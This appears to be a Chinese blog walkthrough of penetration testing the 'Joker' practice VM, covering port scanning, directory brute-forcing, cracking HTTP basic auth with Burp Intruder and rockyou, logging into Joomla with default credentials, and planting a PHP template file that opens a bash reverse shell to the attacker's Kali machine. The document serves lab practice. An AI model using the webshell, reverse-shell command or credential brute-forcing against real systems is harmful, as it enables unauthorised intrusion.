当前位置: 首页 > news >正文

Jocker靶机全面解析:漏洞挖掘、渗透测试与防御策略

news 来源:原创 2025/4/29 4:38:52

1.开启靶机,确保网络适配器是NAT网段

2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169

nmap -O 192.168.139.1/24

3.访问该IP地址

4.访问robots.txt,什么也没有

5.扫描目录

dirb http://192.168.139.169

6.访问一下secret.txt

7.访问phpinfo.php

8.访问8080,尝试爆破这个密码

9.打开BP抓包,发现是base64编码

10.在secret.txt发现一些有用信息,要在kali里面进行操作

cd /usr/share/wordlists
ls
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat rockyou.txt
复制字典的前一百个生成一个txt,后面爆破用。

11.打开BP进行抓包,抓8080端口的包

12.发送到Intrder模块进行爆破,开始攻击

爆破出状态码200,然后解码,账号密码为joker:hannah

13.进行登录

14.登陆成功可以发现该网站是由joomla架构,尝试使用默认账号密码joomla

15.点击后台管理系统

16.用户名和密码joomla

17.可以看到这是他网站的一些模板

18.这里可以新建文件

19.新建666.php写入木马,利用菜刀或者蚁剑进行链接

<?php
 
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.139.142/5555 0>&1'");
 
?>

20.利用kali监听

21.访问http://192.168.139.169:8080/templates/beez3/666.php

回到kali查看是否监听到

相关文章:

  • RuoYi-Vue路由,Node
  • HOVER:人形机器人的多功能神经网络全身控制器
  • Leetcode-回溯-组合型
  • Vue 中如何使用 nextTick?
  • 解决uni-app授权弹框华为审核拒绝
  • OpenAI--Agent SDK简介
  • linux入侵排查-综合日志分析
  • halcon几何测量(一)3d_position_of_rectangle
  • 【QT:多线程、锁】
  • 自然语言处理 | 文本清洗的20种核心策略:从数据噪声到信息价值
  • YunSDR AIR:从架构革新到智能融合的演进之路
  • HTML 专栏总结:回顾与展望
  • ABAP PDF预览
  • 「自动驾驶背后的数学:从传感器数据到控制指令的函数嵌套」—— 揭秘人工智能中的线性函数、ReLU 与复合函数
  • win10搭建opengl环境搭建并测试--输出立方体球体和碗型并在球体上贴图
  • 使用WebDAV将文件传输到实时(RT)目标 转发
  • 3.数据探索与可视化基本图形(直方图、箱线图、散点图)——Python数据挖掘代码实践
  • 《多语言实时交流辅助系统前端的设计与实现》开题报告
  • Redis 10大核心场景实战手册:从缓存加速到分布式锁的全面解析
  • MySQL-单表查询
  • 老凤祥一季度净利减少两成,去年珠宝首饰营收下滑19%
  • 报告显示2024年全球军费开支增幅达冷战后最大
  • 中公教育薪酬透视:董监高合计涨薪122万,员工精简近三成
  • 《奇袭白虎团》原型人物之一赵顺合辞世,享年95岁
  • 民调显示特朗普执政百日支持率为80年来美历任总统最低
  • 新城市志|中国消费第一城,迎来“补贴力度最大”购物节